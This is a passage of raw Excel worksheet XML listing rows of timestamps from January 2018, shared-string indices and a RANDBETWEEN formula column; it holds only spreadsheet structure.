    </row>
    <row r="20500" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20500" s="1">
        <v>43114.489363425928</v>
      </c>
      <c r="C20500" t="s">
        <v>3049</v>
      </c>
      <c r="D20500" t="s">
        <v>17</v>
      </c>
      <c r="E20500" t="s">
        <v>18442</v>
      </c>
      <c r="F20500">
        <f t="shared" ca="1" si="320"/>
        <v>1</v>
      </c>
    </row>
    <row r="20501" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20501" s="1">
        <v>43114.211284722223</v>
      </c>
      <c r="C20501" t="s">
        <v>471</v>
      </c>
      <c r="F20501">
        <f t="shared" ca="1" si="320"/>
        <v>4</v>
      </c>
    </row>
    <row r="20502" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20502" s="1">
        <v>43113.945914351854</v>
      </c>
      <c r="C20502" t="s">
        <v>4500</v>
      </c>
      <c r="F20502">
        <f t="shared" ca="1" si="320"/>
        <v>3</v>
      </c>
    </row>
    <row r="20503" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20503" s="1">
        <v>43113.945543981485</v>
      </c>
      <c r="C20503" t="s">
        <v>4500</v>
      </c>
      <c r="E20503" t="s">
        <v>18443</v>
      </c>
      <c r="F20503">
        <f t="shared" ca="1" si="320"/>
        <v>1</v>
      </c>
    </row>
    <row r="20504" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A20504" s="1">
        <v>43113.726030092592</v>
      </c>
      <c r="C20504" t="s">
        <v>140</v>
      </c>
      <c r="D20504" t="s">
        <v>141</v>
      </c>
      <c r="E20504" s="2" t="s">
        <v>18444</v>
      </c>
      <c r="F20504">
        <f t="shared" ca="1" si="320"/>
        <v>3</v>
      </c>
    </row>
    <row r="20505" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20505" s="1">
        <v>43113.571412037039</v>
      </c>
      <c r="C20505" t="s">
        <v>6</v>
      </c>
      <c r="D20505" t="s">
        <v>25</v>
      </c>
      <c r="E20505" t="s">
        <v>18445</v>
      </c>
      <c r="F20505">
        <f t="shared" ca="1" si="320"/>
        <v>1</v>
      </c>
    </row>
    <row r="20506" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A20506" s="1">
        <v>43113.154305555552</v>
      </c>
      <c r="C20506" t="s">
        <v>817</v>
      </c>
      <c r="D20506" t="s">
        <v>178</v>
      </c>
      <c r="E20506" s="2" t="s">
        <v>18446</v>
      </c>
      <c r="F20506">
        <f t="shared" ca="1" si="320"/>
        <v>1</v>
      </c>
    </row>
    <row r="20507" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20507" s="1">
        <v>43112.99596064815</v>
      </c>
      <c r="C20507" t="s">
        <v>41</v>
      </c>
      <c r="F20507">
        <f t="shared" ca="1" si="320"/>
        <v>5</v>
      </c>
    </row>
    <row r="20508" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20508" s="1">
        <v>43112.994513888887</v>
      </c>
      <c r="C20508" t="s">
        <v>41</v>
      </c>
      <c r="E20508">
        <v>9502668041</v>
      </c>
      <c r="F20508">
        <f t="shared" ca="1" si="320"/>
        <v>4</v>
      </c>
    </row>
    <row r="20509" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A20509" s="1">
        <v>43112.968865740739</v>
      </c>
      <c r="C20509" t="s">
        <v>253</v>
      </c>
      <c r="E20509" s="2" t="s">
        <v>18447</v>
      </c>
      <c r="F20509">
        <f t="shared" ca="1" si="320"/>
        <v>2</v>
      </c>
    </row>
    <row r="20510" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A20510" s="1">
        <v>43112.903773148151</v>
      </c>
      <c r="C20510" t="s">
        <v>10</v>
      </c>
      <c r="D20510" t="s">
        <v>92</v>
      </c>
      <c r="E20510" s="2" t="s">
        <v>18448</v>
      </c>
      <c r="F20510">
        <f t="shared" ca="1" si="320"/>
        <v>2</v>
      </c>
    </row>
    <row r="20511" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20511" s="1">
        <v>43112.733113425929</v>
      </c>
      <c r="C20511" t="s">
        <v>6</v>
      </c>
      <c r="D20511" t="s">
        <v>25</v>
      </c>
      <c r="E20511" t="s">
        <v>18449</v>
      </c>
      <c r="F20511">
        <f t="shared" ca="1" si="320"/>
        <v>3</v>
      </c>
    </row>
    <row r="20512" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20512" s="1">
        <v>43112.715115740742</v>
      </c>
      <c r="C20512" t="s">
        <v>5162</v>
      </c>
      <c r="E20512" t="s">
        <v>18450</v>
      </c>
      <c r="F20512">
        <f t="shared" ca="1" si="320"/>
        <v>4</v>
      </c>
    </row>
    <row r="20513" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20513" s="1">
        <v>43112.713796296295</v>
      </c>
      <c r="C20513" t="s">
        <v>10</v>
      </c>
      <c r="D20513" t="s">
        <v>89</v>
      </c>
      <c r="E20513" t="s">
        <v>18451</v>
      </c>
      <c r="F20513">
        <f t="shared" ca="1" si="320"/>
        <v>5</v>
      </c>
    </row>
    <row r="20514" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A20514" s="1">
        <v>43112.680277777778</v>
      </c>
      <c r="C20514" t="s">
        <v>10</v>
      </c>
      <c r="D20514" t="s">
        <v>52</v>
      </c>
      <c r="E20514" s="2" t="s">
        <v>18452</v>
      </c>
      <c r="F20514">
        <f t="shared" ca="1" si="320"/>
        <v>3</v>
      </c>
    </row>
    <row r="20515" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20515" s="1">
        <v>43112.680092592593</v>
      </c>
      <c r="C20515" t="s">
        <v>10</v>
      </c>
      <c r="D20515" t="s">
        <v>17</v>
      </c>
      <c r="E20515" t="s">
        <v>18453</v>
      </c>
      <c r="F20515">
        <f t="shared" ca="1" si="320"/>
        <v>4</v>
      </c>
    </row>
    <row r="20516" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20516" s="1">
        <v>43112.636828703704</v>
      </c>
      <c r="C20516" t="s">
        <v>260</v>
      </c>
      <c r="D20516" t="s">
        <v>312</v>
      </c>
      <c r="E20516" t="s">
        <v>18454</v>
      </c>
      <c r="F20516">
        <f t="shared" ca="1" si="320"/>
        <v>3</v>
      </c>
    </row>
    <row r="20517" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20517" s="1">
        <v>43112.632268518515</v>
      </c>
      <c r="C20517" t="s">
        <v>10</v>
      </c>
      <c r="D20517" t="s">
        <v>86</v>
      </c>
      <c r="E20517" t="s">
        <v>18455</v>
      </c>
      <c r="F20517">
        <f t="shared" ca="1" si="320"/>
        <v>2</v>
      </c>
    </row>
    <row r="20518" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20518" s="1">
        <v>43112.622974537036</v>
      </c>
      <c r="C20518" t="s">
        <v>222</v>
      </c>
      <c r="E20518" t="s">
        <v>18456</v>
      </c>
      <c r="F20518">
        <f t="shared" ca="1" si="320"/>
        <v>2</v>
      </c>
    </row>
    <row r="20519" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20519" s="1">
        <v>43112.600370370368</v>
      </c>
      <c r="C20519" t="s">
        <v>10</v>
      </c>
      <c r="D20519" t="s">
        <v>271</v>
      </c>
      <c r="E20519" t="s">
        <v>18457</v>
      </c>
      <c r="F20519">
        <f t="shared" ca="1" si="320"/>
        <v>4</v>
      </c>
    </row>
    <row r="20520" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20520" s="1">
        <v>43112.599606481483</v>
      </c>
      <c r="C20520" t="s">
        <v>10</v>
      </c>
      <c r="D20520" t="s">
        <v>6</v>
      </c>
      <c r="E20520" t="s">
        <v>18458</v>
      </c>
      <c r="F20520">
        <f t="shared" ca="1" si="320"/>
        <v>3</v>
      </c>
    </row>
    <row r="20521" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20521" s="1">
        <v>43112.593321759261</v>
      </c>
      <c r="C20521" t="s">
        <v>10</v>
      </c>
      <c r="D20521" t="s">
        <v>271</v>
      </c>
      <c r="E20521" t="s">
        <v>18459</v>
      </c>
      <c r="F20521">
        <f t="shared" ca="1" si="320"/>
        <v>1</v>
      </c>
    </row>
    <row r="20522" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20522" s="1">
        <v>43112.581076388888</v>
      </c>
      <c r="C20522" t="s">
        <v>10</v>
      </c>
      <c r="D20522" t="s">
        <v>112</v>
      </c>
      <c r="E20522" t="s">
        <v>18460</v>
      </c>
      <c r="F20522">
        <f t="shared" ca="1" si="320"/>
        <v>3</v>
      </c>
    </row>
    <row r="20523" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20523" s="1">
        <v>43112.567071759258</v>
      </c>
      <c r="C20523" t="s">
        <v>10</v>
      </c>
      <c r="D20523" t="s">
        <v>52</v>
      </c>
      <c r="E20523" t="s">
        <v>18461</v>
      </c>
      <c r="F20523">
        <f t="shared" ca="1" si="320"/>
        <v>3</v>
      </c>
    </row>
    <row r="20524" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20524" s="1">
        <v>43112.553425925929</v>
      </c>
      <c r="C20524" t="s">
        <v>10</v>
      </c>
      <c r="D20524" t="s">
        <v>17</v>
      </c>
      <c r="E20524" t="s">
        <v>18462</v>
      </c>
      <c r="F20524">
        <f t="shared" ca="1" si="320"/>
        <v>4</v>
      </c>
    </row>
    <row r="20525" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20525" s="1">
        <v>43112.549849537034</v>
      </c>
      <c r="C20525" t="s">
        <v>10</v>
      </c>
      <c r="D20525" t="s">
        <v>163</v>
      </c>
      <c r="F20525">
        <f t="shared" ca="1" si="320"/>
        <v>2</v>
      </c>
    </row>
    <row r="20526" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A20526" s="1">
        <v>43112.549618055556</v>
      </c>
      <c r="C20526" t="s">
        <v>10</v>
      </c>
      <c r="D20526" t="s">
        <v>192</v>
      </c>
      <c r="E20526" s="2" t="s">
        <v>18463</v>
      </c>
      <c r="F20526">
        <f t="shared" ca="1" si="320"/>
        <v>4</v>
      </c>
    </row>
    <row r="20527" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A20527" s="1">
        <v>43112.54791666667</v>
      </c>
      <c r="C20527" t="s">
        <v>41</v>
      </c>
      <c r="E20527" s="2" t="s">
        <v>18464</v>
      </c>
      <c r="F20527">
        <f t="shared" ca="1" si="320"/>
        <v>5</v>
      </c>
    </row>
    <row r="20528" spans="1:6" ht="300" x14ac:dyDescent="0.25">
      <c r="A20528" s="1">
        <v>43112.527465277781</v>
      </c>
      <c r="C20528" t="s">
        <v>586</v>
      </c>
      <c r="E20528" s="2" t="s">
        <v>18465</v>
      </c>
      <c r="F20528">
        <f t="shared" ca="1" si="320"/>
        <v>1</v>
      </c>
    </row>
    <row r="20529" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20529" s="1">
        <v>43112.504641203705</v>
      </c>
      <c r="C20529" t="s">
        <v>10</v>
      </c>
      <c r="D20529" t="s">
        <v>330</v>
      </c>
      <c r="E20529" t="s">
        <v>18466</v>
      </c>
      <c r="F20529">
        <f t="shared" ca="1" si="320"/>
        <v>5</v>
      </c>
    </row>
    <row r="20530" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20530" s="1">
        <v>43112.496006944442</v>
      </c>
      <c r="C20530" t="s">
        <v>10</v>
      </c>
      <c r="D20530" t="s">
        <v>178</v>
      </c>
      <c r="E20530" t="s">
        <v>18467</v>
      </c>
      <c r="F20530">
        <f t="shared" ca="1" si="320"/>
        <v>3</v>
      </c>
    </row>
    <row r="20531" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20531" s="1">
        <v>43112.481608796297</v>
      </c>
      <c r="C20531" t="s">
        <v>10</v>
      </c>
      <c r="D20531" t="s">
        <v>163</v>
      </c>
      <c r="E20531" t="s">
        <v>18468</v>
      </c>
      <c r="F20531">
        <f t="shared" ca="1" si="320"/>
        <v>1</v>
      </c>
    </row>
    <row r="20532" spans="1:6" ht="210" x14ac:dyDescent="0.25">
      <c r="A20532" s="1">
        <v>43112.474664351852</v>
      </c>
      <c r="C20532" t="s">
        <v>48</v>
      </c>
      <c r="E20532" s="2" t="s">
        <v>18469</v>
      </c>
      <c r="F20532">
        <f t="shared" ca="1" si="320"/>
        <v>4</v>
      </c>
    </row>
    <row r="20533" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20533" s="1">
        <v>43112.44667824074</v>
      </c>
      <c r="C20533" t="s">
        <v>65</v>
      </c>
      <c r="E20533" t="s">
        <v>18470</v>
      </c>
      <c r="F20533">
        <f t="shared" ca="1" si="320"/>
        <v>1</v>
      </c>
    </row>
    <row r="20534" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A20534" s="1">
        <v>43112.436400462961</v>
      </c>
      <c r="C20534" t="s">
        <v>65</v>
      </c>
      <c r="D20534" t="s">
        <v>312</v>
      </c>
      <c r="E20534" s="2" t="s">
        <v>18471</v>
      </c>
      <c r="F20534">
        <f t="shared" ca="1" si="320"/>
        <v>1</v>
      </c>
    </row>
    <row r="20535" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20535" s="1">
        <v>43112.420891203707</v>
      </c>
      <c r="C20535" t="s">
        <v>16</v>
      </c>
      <c r="E20535" t="s">
        <v>18472</v>
      </c>
      <c r="F20535">
        <f t="shared" ca="1" si="320"/>
        <v>2</v>
      </c>
    </row>
    <row r="20536" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A20536" s="1">
        <v>43112.414270833331</v>
      </c>
      <c r="C20536" t="s">
        <v>10</v>
      </c>
      <c r="D20536" t="s">
        <v>36</v>
      </c>
      <c r="E20536" s="2" t="s">
        <v>18473</v>
      </c>
      <c r="F20536">
        <f t="shared" ca="1" si="320"/>
        <v>4</v>
      </c>
    </row>
    <row r="20537" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20537" s="1">
        <v>43112.40519675926</v>
      </c>
      <c r="C20537" t="s">
        <v>10</v>
      </c>
      <c r="D20537" t="s">
        <v>163</v>
      </c>
      <c r="E20537" t="s">
        <v>18474</v>
      </c>
      <c r="F20537">
        <f t="shared" ca="1" si="320"/>
        <v>2</v>
      </c>
    </row>
    <row r="20538" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20538" s="1">
        <v>43112.403182870374</v>
      </c>
      <c r="C20538" t="s">
        <v>10</v>
      </c>
      <c r="D20538" t="s">
        <v>80</v>
      </c>
      <c r="E20538" t="s">
        <v>18475</v>
      </c>
      <c r="F20538">
        <f t="shared" ca="1" si="320"/>
        <v>3</v>
      </c>
    </row>
    <row r="20539" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20539" s="1">
        <v>43112.393321759257</v>
      </c>
      <c r="C20539" t="s">
        <v>10</v>
      </c>
      <c r="D20539" t="s">
        <v>494</v>
      </c>
      <c r="E20539" t="s">
        <v>18476</v>
      </c>
      <c r="F20539">
        <f t="shared" ca="1" si="320"/>
        <v>4</v>
      </c>
    </row>
    <row r="20540" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20540" s="1">
        <v>43112.388333333336</v>
      </c>
      <c r="C20540" t="s">
        <v>10</v>
      </c>
      <c r="D20540" t="s">
        <v>192</v>
      </c>
      <c r="E20540" t="s">
        <v>18477</v>
      </c>
      <c r="F20540">
        <f t="shared" ca="1" si="320"/>
        <v>3</v>
      </c>
    </row>
    <row r="20541" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20541" s="1">
        <v>43112.381655092591</v>
      </c>
      <c r="C20541" t="s">
        <v>107</v>
      </c>
      <c r="E20541" t="s">
        <v>18478</v>
      </c>
      <c r="F20541">
        <f t="shared" ca="1" si="320"/>
        <v>1</v>
      </c>
    </row>
    <row r="20542" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A20542" s="1">
        <v>43112.380925925929</v>
      </c>
      <c r="C20542" t="s">
        <v>48</v>
      </c>
      <c r="E20542" s="2" t="s">
        <v>18479</v>
      </c>
      <c r="F20542">
        <f t="shared" ca="1" si="320"/>
        <v>2</v>
      </c>
    </row>
    <row r="20543" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20543" s="1">
        <v>43112.372488425928</v>
      </c>
      <c r="C20543" t="s">
        <v>10</v>
      </c>
      <c r="D20543" t="s">
        <v>20</v>
      </c>
      <c r="E20543" t="s">
        <v>18480</v>
      </c>
      <c r="F20543">
        <f t="shared" ca="1" si="320"/>
        <v>3</v>
      </c>
    </row>
    <row r="20544" spans="1:6" ht="180" x14ac:dyDescent="0.25">
      <c r="A20544" s="1">
        <v>43112.329050925924</v>
      </c>
      <c r="C20544" t="s">
        <v>10</v>
      </c>
      <c r="D20544" t="s">
        <v>36</v>
      </c>
      <c r="E20544" s="2" t="s">
        <v>18481</v>
      </c>
      <c r="F20544">
        <f t="shared" ca="1" si="320"/>
        <v>1</v>
      </c>
    </row>
    <row r="20545" spans="1:6" ht="180" x14ac:dyDescent="0.25">
      <c r="A20545" s="1">
        <v>43112.28025462963</v>
      </c>
      <c r="C20545" t="s">
        <v>71</v>
      </c>
      <c r="D20545" t="s">
        <v>312</v>
      </c>
      <c r="E20545" s="2" t="s">
        <v>18482</v>
      </c>
      <c r="F20545">
        <f t="shared" ca="1" si="320"/>
        <v>3</v>
      </c>
    </row>
    <row r="20546" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20546" s="1">
        <v>43112.279606481483</v>
      </c>
      <c r="C20546" t="s">
        <v>48</v>
      </c>
      <c r="E20546" t="s">
        <v>18483</v>
      </c>
      <c r="F20546">
        <f t="shared" ref="F20546:F20609" ca="1" si="321">RANDBETWEEN(1,5)</f>
        <v>1</v>
      </c>
    </row>
    <row r="20547" spans="1:6" ht="240" x14ac:dyDescent="0.25">
      <c r="A20547" s="1">
        <v>43112.244270833333</v>
      </c>
      <c r="C20547" t="s">
        <v>173</v>
      </c>
      <c r="E20547" s="2" t="s">
        <v>18484</v>
      </c>
      <c r="F20547">
        <f t="shared" ca="1" si="321"/>
        <v>2</v>
      </c>
    </row>
    <row r="20548" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A20548" s="1">
        <v>43112.240069444444</v>
      </c>
      <c r="C20548" t="s">
        <v>92</v>
      </c>
      <c r="E20548" s="2" t="s">
        <v>18485</v>
      </c>
      <c r="F20548">
        <f t="shared" ca="1" si="321"/>
        <v>5</v>
      </c>
    </row>
    <row r="20549" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20549" s="1">
        <v>43112.237685185188</v>
      </c>
      <c r="C20549" t="s">
        <v>92</v>
      </c>
      <c r="F20549">
        <f t="shared" ca="1" si="321"/>
        <v>3</v>
      </c>
    </row>
    <row r="20550" spans="1:6" ht="270" x14ac:dyDescent="0.25">
      <c r="A20550" s="1">
        <v>43112.172083333331</v>
      </c>
      <c r="C20550" t="s">
        <v>71</v>
      </c>
      <c r="E20550" s="2" t="s">
        <v>18486</v>
      </c>
      <c r="F20550">
        <f t="shared" ca="1" si="321"/>
        <v>4</v>
      </c>
    </row>
    <row r="20551" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20551" s="1">
        <v>43112.169166666667</v>
      </c>
      <c r="C20551" t="s">
        <v>71</v>
      </c>
      <c r="E20551" t="s">
        <v>18487</v>
      </c>
      <c r="F20551">
        <f t="shared" ca="1" si="321"/>
        <v>3</v>
      </c>
    </row>
    <row r="20552" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A20552" s="1">
        <v>43112.116712962961</v>
      </c>
      <c r="C20552" t="s">
        <v>139</v>
      </c>
      <c r="E20552" s="2" t="s">
        <v>18488</v>
      </c>
      <c r="F20552">
        <f t="shared" ca="1" si="321"/>
        <v>2</v>
      </c>
    </row>
    <row r="20553" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A20553" s="1">
        <v>43112.096932870372</v>
      </c>
      <c r="C20553" t="s">
        <v>73</v>
      </c>
      <c r="E20553" s="2" t="s">
        <v>18489</v>
      </c>
      <c r="F20553">
        <f t="shared" ca="1" si="321"/>
        <v>4</v>
      </c>
    </row>
    <row r="20554" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20554" s="1">
        <v>43111.881585648145</v>
      </c>
      <c r="C20554" t="s">
        <v>139</v>
      </c>
      <c r="E20554" t="s">
        <v>18490</v>
      </c>
      <c r="F20554">
        <f t="shared" ca="1" si="321"/>
        <v>2</v>
      </c>
    </row>
    <row r="20555" spans="1:6" ht="285" x14ac:dyDescent="0.25">
      <c r="A20555" s="1">
        <v>43111.832060185188</v>
      </c>
      <c r="C20555" t="s">
        <v>10</v>
      </c>
      <c r="D20555" t="s">
        <v>52</v>
      </c>
      <c r="E20555" s="2" t="s">
        <v>18491</v>
      </c>
      <c r="F20555">
        <f t="shared" ca="1" si="321"/>
        <v>3</v>
      </c>
    </row>
    <row r="20556" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20556" s="1">
        <v>43111.800324074073</v>
      </c>
      <c r="C20556" t="s">
        <v>8588</v>
      </c>
      <c r="D20556" t="s">
        <v>41</v>
      </c>
      <c r="E20556" t="s">
        <v>18492</v>
      </c>
      <c r="F20556">
        <f t="shared" ca="1" si="321"/>
        <v>4</v>
      </c>
    </row>
    <row r="20557" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20557" s="1">
        <v>43111.790231481478</v>
      </c>
      <c r="C20557" t="s">
        <v>10</v>
      </c>
      <c r="D20557" t="s">
        <v>94</v>
      </c>
      <c r="E20557" t="s">
        <v>18493</v>
      </c>
      <c r="F20557">
        <f t="shared" ca="1" si="321"/>
        <v>1</v>
      </c>
    </row>
    <row r="20558" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20558" s="1">
        <v>43111.784918981481</v>
      </c>
      <c r="C20558" t="s">
        <v>6230</v>
      </c>
      <c r="D20558" t="s">
        <v>271</v>
      </c>
      <c r="E20558" t="s">
        <v>18494</v>
      </c>
      <c r="F20558">
        <f t="shared" ca="1" si="321"/>
        <v>5</v>
      </c>
    </row>
    <row r="20559" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A20559" s="1">
        <v>43111.784155092595</v>
      </c>
      <c r="C20559" t="s">
        <v>10</v>
      </c>
      <c r="D20559" t="s">
        <v>11</v>
      </c>
      <c r="E20559" s="2" t="s">
        <v>18495</v>
      </c>
      <c r="F20559">
        <f t="shared" ca="1" si="321"/>
        <v>2</v>
      </c>
    </row>
    <row r="20560" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A20560" s="1">
        <v>43111.73641203704</v>
      </c>
      <c r="C20560" t="s">
        <v>6</v>
      </c>
      <c r="D20560" t="s">
        <v>25</v>
      </c>
      <c r="E20560" s="2" t="s">
        <v>18496</v>
      </c>
      <c r="F20560">
        <f t="shared" ca="1" si="321"/>
        <v>1</v>
      </c>
    </row>
    <row r="20561" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20561" s="1">
        <v>43111.723356481481</v>
      </c>
      <c r="C20561" t="s">
        <v>10</v>
      </c>
      <c r="D20561" t="s">
        <v>229</v>
      </c>
      <c r="E20561" t="s">
        <v>18497</v>
      </c>
      <c r="F20561">
        <f t="shared" ca="1" si="321"/>
        <v>2</v>
      </c>
    </row>
    <row r="20562" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A20562" s="1">
        <v>43111.661273148151</v>
      </c>
      <c r="C20562" t="s">
        <v>10</v>
      </c>
      <c r="D20562" t="s">
        <v>17</v>
      </c>
      <c r="E20562" s="2" t="s">
        <v>18498</v>
      </c>
      <c r="F20562">
        <f t="shared" ca="1" si="321"/>
        <v>1</v>
      </c>
    </row>
    <row r="20563" spans="1:6" ht="375" x14ac:dyDescent="0.25">
      <c r="A20563" s="1">
        <v>43111.62226851852</v>
      </c>
      <c r="C20563" t="s">
        <v>10</v>
      </c>
      <c r="D20563" t="s">
        <v>244</v>
      </c>
      <c r="E20563" s="2" t="s">
        <v>18499</v>
      </c>
      <c r="F20563">
        <f t="shared" ca="1" si="321"/>
        <v>2</v>
      </c>
    </row>
    <row r="20564" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20564" s="1">
        <v>43111.603067129632</v>
      </c>
      <c r="C20564" t="s">
        <v>10</v>
      </c>
      <c r="D20564" t="s">
        <v>11</v>
      </c>
      <c r="E20564" t="s">
        <v>18500</v>
      </c>
      <c r="F20564">
        <f t="shared" ca="1" si="321"/>
        <v>4</v>
      </c>
    </row>
    <row r="20565" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20565" s="1">
        <v>43111.602696759262</v>
      </c>
      <c r="C20565" t="s">
        <v>6</v>
      </c>
      <c r="D20565" t="s">
        <v>25</v>
      </c>
      <c r="E20565" t="s">
        <v>18501</v>
      </c>
      <c r="F20565">
        <f t="shared" ca="1" si="321"/>
        <v>5</v>
      </c>
    </row>
    <row r="20566" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20566" s="1">
        <v>43111.591180555559</v>
      </c>
      <c r="C20566" t="s">
        <v>10</v>
      </c>
      <c r="D20566" t="s">
        <v>80</v>
      </c>
      <c r="E20566" t="s">
        <v>18502</v>
      </c>
      <c r="F20566">
        <f t="shared" ca="1" si="321"/>
        <v>2</v>
      </c>
    </row>
    <row r="20567" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20567" s="1">
        <v>43111.58556712963</v>
      </c>
      <c r="C20567" t="s">
        <v>10</v>
      </c>
      <c r="D20567" t="s">
        <v>6</v>
      </c>
      <c r="E20567" t="s">
        <v>18503</v>
      </c>
      <c r="F20567">
        <f t="shared" ca="1" si="321"/>
        <v>3</v>
      </c>
    </row>
    <row r="20568" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20568" s="1">
        <v>43111.534479166665</v>
      </c>
      <c r="C20568" t="s">
        <v>10</v>
      </c>
      <c r="D20568" t="s">
        <v>158</v>
      </c>
      <c r="E20568" t="s">
        <v>18504</v>
      </c>
      <c r="F20568">
        <f t="shared" ca="1" si="321"/>
        <v>1</v>
      </c>
    </row>
    <row r="20569" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20569" s="1">
        <v>43111.532071759262</v>
      </c>
      <c r="C20569" t="s">
        <v>10</v>
      </c>
      <c r="D20569" t="s">
        <v>6</v>
      </c>
      <c r="E20569" t="s">
        <v>18505</v>
      </c>
      <c r="F20569">
        <f t="shared" ca="1" si="321"/>
        <v>3</v>
      </c>
    </row>
    <row r="20570" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20570" s="1">
        <v>43111.510879629626</v>
      </c>
      <c r="C20570" t="s">
        <v>253</v>
      </c>
      <c r="E20570" t="s">
        <v>18506</v>
      </c>
      <c r="F20570">
        <f t="shared" ca="1" si="321"/>
        <v>1</v>
      </c>
    </row>
    <row r="20571" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A20571" s="1">
        <v>43111.495810185188</v>
      </c>
      <c r="C20571" t="s">
        <v>667</v>
      </c>
      <c r="D20571" t="s">
        <v>2214</v>
      </c>
      <c r="E20571" s="2" t="s">
        <v>18507</v>
      </c>
      <c r="F20571">
        <f t="shared" ca="1" si="321"/>
        <v>4</v>
      </c>
    </row>
    <row r="20572" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A20572" s="1">
        <v>43111.488252314812</v>
      </c>
      <c r="C20572" t="s">
        <v>65</v>
      </c>
      <c r="E20572" s="2" t="s">
        <v>18508</v>
      </c>
      <c r="F20572">
        <f t="shared" ca="1" si="321"/>
        <v>5</v>
      </c>
    </row>
    <row r="20573" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A20573" s="1">
        <v>43111.488229166665</v>
      </c>
      <c r="C20573" t="s">
        <v>65</v>
      </c>
      <c r="E20573" s="2" t="s">
        <v>18508</v>
      </c>
      <c r="F20573">
        <f t="shared" ca="1" si="321"/>
        <v>1</v>
      </c>
    </row>
    <row r="20574" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20574" s="1">
        <v>43111.480949074074</v>
      </c>
      <c r="C20574" t="s">
        <v>10</v>
      </c>
      <c r="D20574" t="s">
        <v>36</v>
      </c>
      <c r="E20574" t="s">
        <v>18509</v>
      </c>
      <c r="F20574">
        <f t="shared" ca="1" si="321"/>
        <v>4</v>
      </c>
    </row>
    <row r="20575" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A20575" s="1">
        <v>43111.473657407405</v>
      </c>
      <c r="C20575" t="s">
        <v>65</v>
      </c>
      <c r="E20575" s="2" t="s">
        <v>18510</v>
      </c>
      <c r="F20575">
        <f t="shared" ca="1" si="321"/>
        <v>3</v>
      </c>
    </row>
    <row r="20576" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20576" s="1">
        <v>43111.45652777778</v>
      </c>
      <c r="C20576" t="s">
        <v>10</v>
      </c>
      <c r="D20576" t="s">
        <v>41</v>
      </c>
      <c r="E20576" t="s">
        <v>18511</v>
      </c>
      <c r="F20576">
        <f t="shared" ca="1" si="321"/>
        <v>1</v>
      </c>
    </row>
    <row r="20577" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20577" s="1">
        <v>43111.448171296295</v>
      </c>
      <c r="C20577" t="s">
        <v>6</v>
      </c>
      <c r="D20577" t="s">
        <v>7</v>
      </c>
      <c r="E20577" t="s">
        <v>18512</v>
      </c>
      <c r="F20577">
        <f t="shared" ca="1" si="321"/>
        <v>4</v>
      </c>
    </row>
    <row r="20578" spans="1:6" ht="409.5" x14ac:dyDescent="0.25">
      <c r="A20578" s="1">
        <v>43111.441805555558</v>
      </c>
      <c r="C20578" t="s">
        <v>48</v>
      </c>
      <c r="E20578" s="2" t="s">
